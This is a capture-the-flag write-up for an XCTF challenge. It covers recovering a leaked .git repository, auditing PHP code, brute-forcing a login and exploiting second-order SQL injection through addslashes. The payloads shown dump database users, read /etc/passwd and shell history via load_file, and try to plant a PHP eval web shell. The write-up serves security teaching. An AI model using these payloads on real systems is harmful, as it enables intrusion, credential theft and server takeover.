CTF_comment_git library leak && secondary injection _wp

Keyword
git library leak code audit addslashes secondary injection sql injection mysql hex query 

Table of contents

foreword

original address

Git repository leak

1.git library discovery

2.git library download

3. Analysis of git library code version information

sql secondary injection

Blast user password

Secondary Injection Exploitation

mysql hex query

Refer to web resources

---

foreword

Git is an open source distributed version control system for agile and efficient handling of any project, small or large. At present, a large number of developers use git for version control and automatic deployment of the site. If not configured properly, the .git folder may be deployed directly to the live environment. This causes the git leak vulnerability. An attacker can use this vulnerability to download all the contents of the git folder. If there is sensitive information in the file, such as site source code, database account password, etc., the attacker may attack the server by collecting the information......
 

original address

Offense and Defense World (xctf.org.cn) https://adworld.xctf.org.cn/challenges/list

After entering the question---log in and see the message board

Redirected to a login page after trying to post

The placeholder attribute in the form seems to indicate that the username is zhangwei and the password starts with zhangwei***. Here we can try whether there is sql injection in the form! Use the universal password' or '1 or zhangwei'# But all failed, if it doesn't work, just run the dictionary...

Look at the traffic information just now. When we click the submit button, the form will submit information to write_do.php?do=write, but there may be no login status and it will be redirected to the login.php page, allowing us to log in.

 These are all prefaces. The git library is the focus of this ctf question.

Git repository leak

1.git library discovery

Using dirsearch to scan the directory, we found that there is a git library directory

dirsearch -u http://61.147.171.105:56303/

Trying to download the .git library. Access to the git directory is prohibited. At this time, you need to use a script!

┌──(kali㉿kali)-[~] └─$ wget -r http://61.147.171.105:56303/.git
--2023-0x-xx 08:31:09-- http://61.147.171.105:56303/.git Connecting to 61.147.171.105:56303... connected. HTTP request sent, awaiting response... 301 Moved Permanently Location: http://61.147.171.105:56303/.git/ [following] --2023-0x-xx 08:31:09-- http://61.147.171.105:56303/.git/ Reusing existing connection to 61.147.171.105:56303. HTTP request sent, awaiting response... 403 Forbidden 2023-0x-xx 08:31:09 ERROR 403: Forbidden.

2.git library download

Download GitHack
git clone GitHub - BugScanTeam/GitHack: .git Leak Exploitation Tool to Restore Historical Versions

GitHub - BugScanTeam/GitHack: .git leak exploit tool that restores past versions. git leak exploit tool that restores past versions. Contribute to BugScanTeam/GitHack development by creating an account on GitHub. https://github.com/BugScanTeam/ GitHack  tries to download the git library
python2 GitHack.pyhttp://61.147.171.105:56303/.git/

3. Analysis of git library code version information

Go to the folder created by github and prepare to use the git command

cd 61.147.171.105_56303 ; ls

This code framework does not seem to be finished yet.

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    break;
case 'comment':
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

        There will be several states for file modification (addition, deletion, update) in the Git working directory, and the state of these modifications will change as we execute Git commands.

Our main focus is to focus on the commit log

git log --reflog

You can see that there are three version information in history and there is comment information currently in the first version information location
git reflog

The query through the git command also verified that the author deliberately rolled back the version information to the bfbd21 version. But in fact, we can still go back to the e5b2 version by means, which also shows that the version rollback is not to delete the previous version.

Here I use the diff command to see what has been added and modified between each version, which is convenient for code auditing.

The first version and the second version without any modification

Compare the first version with the third version

└─$ git diff bfbdf218902476c5c6164beedd8d2fcf593ea23b e5b2a2443c2b6d395d06960123142bc91123148c

The version falls back to the e5b2 version to view the code

git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c
cat write_do.php

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

sql secondary injection

 Do code audit (analysis is in comments)

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");//没有sess信息 重定向到login.php  所以必须先登录了
    die();
}
if(isset($_GET['do'])){//get传参do
switch ($_GET['do'])
{
case 'write'://?do=write
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);//输入category title content参数下的特殊字符会被addslashes转义。
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);//执行插入sql语句
    header("Location: ./index.php");
    break;
    //通过网络收索 addslashes sql注入 我们得到了一条重要的线索 addslashes存在二次注入的可能
    //参考链接https://blog.csdn.net/weixin_52501704/article/details/126863948
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);//这里果然进行了再次查询
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];//category可控 可以进行拼接sql注入
    $content = addslashes($_POST['content']);//获取content 将一些表board更新到commnet表中
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    //假如输入是以下数据 /**/多行注释 #单行注释
    //$category = 1',content=database(),/*
    //content = */#
    $sql = "insert into comment
            set category = '1',content=database(),/*',
                content = '*/#',
                bo_id = '$bo_id'";

    $result = mysql_query($sql);//执行存在二次注入风险的sql语句
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

 The figure below shows that */# will not add backslashes after addslashes

Although addslashes turns ' into \', the backslashes are gone when inserted into the database

There is a possibility of secondary injection in addslashes. Refer to Study Notes-SQL Injection-2_addslashes SQL Injection_H1111B’s Blog-CSDN Blog SQL Injection-Secondary Injection (Principle) https://blog.csdn.net/weixin_52501704/article/details/126863948

        The principle of secondary injection, when inserting data into the database for the first time, only uses addslashes or uses get_magic_quotes_gpc to escape the special characters in it, but addslashes has a feature that although the parameters will be added after filtering ' \' for escaping, but '\' will not be inserted into the database, and the original data will be retained when writing to the database.

        We need to obtain a login session before exploiting the vulnerability

Blast user password

Blast user zhangwei password

1. Add parameters in selection mode under intruder

 2. Set playload

 3. Analysis result password zhangwei666

Secondary Injection Exploitation

Logged in, ready to post and submit to write_do.php?do=write 

Through the analysis, we also know that the place to submit the message is the secondary injection part of the content we are looking for

input content = */#

As expected, the return here is different. There is indeed a second SQL injection, which also shows that the current database is ctf.

Construct sql injection point
1', content=(select 123), /*

Query table 1' under the database ctf , content=(select group_concat(table_name) from information_schema.tables where table_schema='ctf'), /*

(content = */# )

查询表user字段
1',content=(Select group_concat(column_name) from information_schema.columns where table_name='user'),/*

return field

留言</label><div class="col-sm-5"><p>id,username,password,Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,Event_priv,Trigger_priv,Create_tablespace_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections,plugin,authentication_string

Information under the query field
1', content=(select concat_ws(':', id, username, password) from user), /*

After tossing for a long time, trying to find the clue of the flag in the sql database failed.

See if there is any export and import permission. It is really hard to check under the current conditions. Then we directly try to write the Trojan into it and guess that the website directory is under /var/www

select '<?php @eval($_get["cmd"])?>' into outfile "/var/www/shell.php"
1',content=(select '<?php @eval($_get["cmd"])?>' into outfile "/var/www/shell.php" ),/*
1',content=(select 123 into outfile "/var/www/shell.txt" ),/*

 I have tried a lot here, it seems that the one-sentence Trojan horse has been filtered, and 123 has not been imported successfully.

Then use load_file to look at other important files to collect specialized dictionaries to collect as much information as possible

reference dictionary

Auto_Wordlists/wordlists at main · carlospolop/Auto_Wordlists · GitHubContribute to carlospolop/Auto_Wordlists development by creating an account on GitHub.https://github.com/carlospolop/Auto_Wordlists/tree/main/wordlists收集用户

1',content=(select load_file('/etc/passwd')),/*

Found the www user's attempts to access the user's execution command history

1',content=(select load_file('/home/www/.bash_history')),/*

Enter cd /tmp, unzip the package html.zip and copy it to /var/www/, enter /var/www and delete the file .DS_Store

You can go to tmp to see what hidden things are stored in the deleted .DS_Store

1',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*

Is this a normal string? Copy it

mysql hex query

There are indications that this file is not generally good because mysql provides the hex function and we extract the binary data of this file

1',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*

At this time, a large piece of binary data was obtained

For binary data, I provide two decodings here

00000001427564310000100000000800000010000000040A000000000000000000000000000000000000000000000800000008000000000000000000000000000000000000000002000000000000000B000000010000100000730074007200610070496C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000B000000090062006F006F007400730074007200610070496C6F63626C6F62000000100000004600000028FFFFFFFFFFFF00000000000B0063006F006D006D0065006E0074002E007000680070496C6F63626C6F6200000010000000CC0000002800000001FFFF000000000003006300730073496C6F63626C6F62000000100000015200000028FFFFFFFFFFFF0000000000190066006C00610067005F0038003900340036006500310066006600310065006500330065003400300066002E007000680070496C6F63626C6F6200000010000001D800000028FFFFFFFFFFFF0000000000050066006F006E00740073496C6F63626C6F62000000100000004600000098FFFFFFFFFFFF0000000000090069006E006400650078002E007000680070496C6F63626C6F6200000010000000CC0000009800000002FFFF000000000002006A0073496C6F63626C6F62000000100000015200000098FFFFFFFFFFFF000000000009006C006F00670069006E002E007000680070496C6F63626C6F6200000010000001D800000098FFFFFFFFFFFF000000000009006D007900730071006C002E007000680070496C6F63626C6F62000000100000004600000108FFFFFFFFFFFF00000000000600760065006E0064006F0072496C6F63626C6F6200000010000000CC00000108FFFFFFFFFFFF00000000000C00770072006900740065005F0064006F002E007000680070496C6F63626C6F62000000100000015200000108FFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000080B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000002000000001000000400000000100000080000000010000010000000001000002000000000100000400000000000000000100001000000000010000200000000001000040000000000100008000000000010001000000000001000200000000000100040000000000010008000000000001001000000000000100200000000000010040000000000001008000000000000101000000000000010200000000000001040000000000000108000000000000011000000000000001200000000000000140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000000000100B000000450000040A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000104445344420000000100000000000000000000000000000000000000000000000200000020000000600000000000000001000000800000000100000100000000010000020000000000000000020000080000001800000000000000000100002000000000010000400000000001000080000000000100010000000000010002000000000001000400000000000100080000000000010010000000000001002000000000000100400000000000010080000000000001010000000000000102000000000000010400000000000001080000000000000110000000000000012000000000000001400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

The first online decoding HEX to character hexadecimal to character hex gb2312 gbk utf8 Chinese character internal code conversion - The X online tool converts hexadecimal byte stream into string, supports gb2312/gbk/utf8 and unicode character encoding . https://the-x.cn/encodings/Hex.aspx

CyberChef (gchq.github.io)https://gchq.github.io/CyberChef/

input hex into

The second uses the HEX tool

Create a new file txt, open the file with hex, fill in the binary data, and you can see the decoding information on the right

Page access This file does exist, but there is no content. Use sql for secondary injection again.

1',content=(select load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')),/*

in source code

 get the flag

$flag="flag{0dd14aae81d94904b3492117e2a3d4df}

Refer to web resources

git exploit tool
https://github.com/BugScanTeam/GitHack

sql secondary injection addslashes
study notes-SQL injection-2_addslashes sql injection_H1111B's Blog-CSDN Blog

Git Library Use Tutorial-Dark Horse Programmer
Dark Horse Programmer Git Complete Tutorial, Complete Git Project Management Tool Tutorial, A Set of Proficient Git_哔哩哔哩_bilibili

File contains dictionary reference file
Auto_Wordlists/wordlists at main carlospolop/Auto_Wordlists GitHub

 hex decoding
CyberChef
HEX to character hexadecimal to character hex gb2312 gbk utf8 Chinese character internal code conversion- The X Online Tools